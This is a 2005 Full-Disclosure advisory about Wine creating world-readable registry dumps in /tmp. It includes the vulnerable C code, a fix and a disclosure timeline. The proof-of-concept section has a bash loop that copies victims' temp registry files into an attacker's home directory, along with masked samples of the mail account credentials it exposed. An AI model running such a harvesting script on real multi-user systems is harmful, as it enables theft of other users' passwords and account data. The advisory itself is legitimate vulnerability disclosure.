SecurityvulnsSECURITYVULNS:DOC:8058[Full-disclosure] [ZH2005-02SA] Insecure tmp file creation in Wine
Title: Insecure tmp file creation in Wine
Author: Giovanni Delvecchio
e-mail: [email protected]
Version affected : Wine 20050211 and previous releases
About Wine
from http://www.winehq.org/site/docs/wine-faq/index :
Wine is a program which allows the operation of DOS and MS Windows programs
(Windows 3.x and Win32 executables) on UNIX operating systems such as Linux.
It consists of a program loader, which loads and executes a Windows binary,
and a set of libraries that implements Windows API calls using their UNIX or
X11 equivalents. The libraries may also be used for porting Win32 code into
native UNIX executables, often without many changes in the source. Wine is
free software, and its license (contained in the file LICENSE in each
distribution) is the LGPL.
Problem
When a win32 application is launched by wine, wine makes a dump of the
windows registry in /tmp with name regxxxxyyyy.tmp , where xxxxxx is the pid
in hexadecimal value of the current wine process and yyyy is an integer
value usually equal to zero.
regxxxxyyyy.tmp is created with 0644 ( -rw-r–r-- )permissions.
This could represent a security problem in a multi-user environment.
Indeed, any local user could access to windows regstry's dump and get
sensitive information, like passwords and other private data.
Details
The functions affected are _get_tmp_fn(FILE **) in
$winerelease/misc/registry.c and
save_branch( struct key *key, const char *path ) in
$winerelease/server/registry.c
_get_tmp_fn(FILE **) @ $winerelease/misc/registry.c :
static LPSTR _get_tmp_fn(FILE **f)
{
LPSTR ret;
int tmp_fd,count;
ret = _xmalloc(50);
for (count = 0;;) {
sprintf(ret,"/tmp/reg%lx%04x.tmp",(long)getpid(),count++);
//here file regxxxyyyy.tmp is not created with secure permssions
if ((tmp_fd = open(ret,O_CREAT | O_EXCL | O_WRONLY,0666)) != -1) break;
if (errno != EEXIST) {
ERR("Unexpected error while open() call: %s\n",strerror(errno));
free(ret);
*f = NULL;
return NULL;
}
}
save_branch( struct key *,const char * ) @ $winerelease/server/registry.c:
static int save_branch( struct key *key, const char *path )
{
struct stat st;
char *p, *real, *tmp = NULL;
int fd, count = 0, ret = 0, by_symlink;
FILE *f;
.
.
.
for (;;)
{
sprintf( p, "reg%lx%04x.tmp", (long) getpid(), count++ );
//here file regxxxyyyy.tmp is not created with secure permssions
if ((fd = open( tmp, O_CREAT | O_EXCL | O_WRONLY, 0666 )) != -1) break;
if (errno != EEXIST) goto done;
close( fd );
}
.
.
.
}
When regxxxyyyy.tmp is created by open(), 0666 mode is used as argument.
Since default umask is 022 ==> (0666) &~ (022) = 0644 = -rw-r–r–
the file will be created with 0644 permissions.
Proof of Concepts
To expoloit this bug, a local attacker could use a bash script to check the
presence of regxxxyyyy.tmp in /tmp and copy it in his home directory for a
successive analysis.
Example of bash script:
#!/bin/sh
count=1
while [ true ]; do
if [ -f /tmp/reg*.tmp ]; then
cp /tmp/reg* /home/attacker/reg$count
count=$(($count + 1))
sleep 1
fi
done
I have made some tests to reproduce this bug, running several applications
and i noted that has been possible get sensitive information like:
[Software\\Microsoft\\Protected Storage System
Provider\\Default\\Data\\b9819c52-1e12-4bbd-91e7-af9afea5b02d
\\87f5aab7-ca62-41c5-8896-27714d7b7e73\\MARSUSERPROTECTEDINFO]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item
Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx
[Software\\Microsoft\\Protected Storage System
Provider\\Default\\Data\\220d5cc1-853a-11d0-84bc-00c04fd43f8f
\\417e2d75-84bd-11d0-84bb-00c04fd43f8f\\HotmailCC990760]
"Behavior"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx
"Item
Data"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
and
[Software\\Microsoft\\Internet Account Manager\\Accounts\\00000008]
"Account Name"="libero.it"
"Connection Type"=dword:00000003
"POP3 Server"="pop3.libero.it"
"POP3 User Name"="xxxxxxx"
"POP3
Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"POP3 Prompt for Password"=dword:00000000
"SMTP Server"="mail.libero.it"
"SMTP Display Name"="xxxxxx"
"SMTP Email Address"="[email protected]"
"POP3 Skip Account"=dword:00000000
"POP3 Port"=dword:0000006e
"SMTP User Name"=""
"SMTP
Password2"=hex:xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,xx,\
xx,xx,xx,xx,xx,xx,xx,xx,xx,xx
"SMTP Use Sicily"=dword:00000000
"SMTP Prompt for Password"=dword:00000000
where there were MSN Explorer and outlook's passwords encrypted.
Note that also if they are encrypted, they could be imported on the windows
registry system of the attacker and so gain illegal access with victim's
account, or using one of many tools availble on the net to "crack" such
encrypted password.
Solution:
A fix for this problem could be call the function open() using 0600 mode:
… open(ret,O_CREAT | O_EXCL | O_WRONLY,0600)) …
I have provided a possible patch :
donwload the patch file from http://www.zone-h.org/download/file=5374/ in
your wine sources directory and launch:
gzip -cd wine_registry_patch.tar.gz | patch -p1
Timeline
11th February 2005 - Bug dicovered
12th February 2005 - Wine contacted by [email protected]
13th March 2005 - Public advisory
Note: 10th March 2005 - Wine20050310 has been released, but the problem has
not been fixed yet .
Reference:
http://bugs.winehq.org/show_bug.cgi?id=2715
http://www.zone-h.org/advisories/read/id=7300
Scopri il nuovo MSN Htomail - 10MB di allegati
http://www.msn.it/hotmail/minisite_10
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/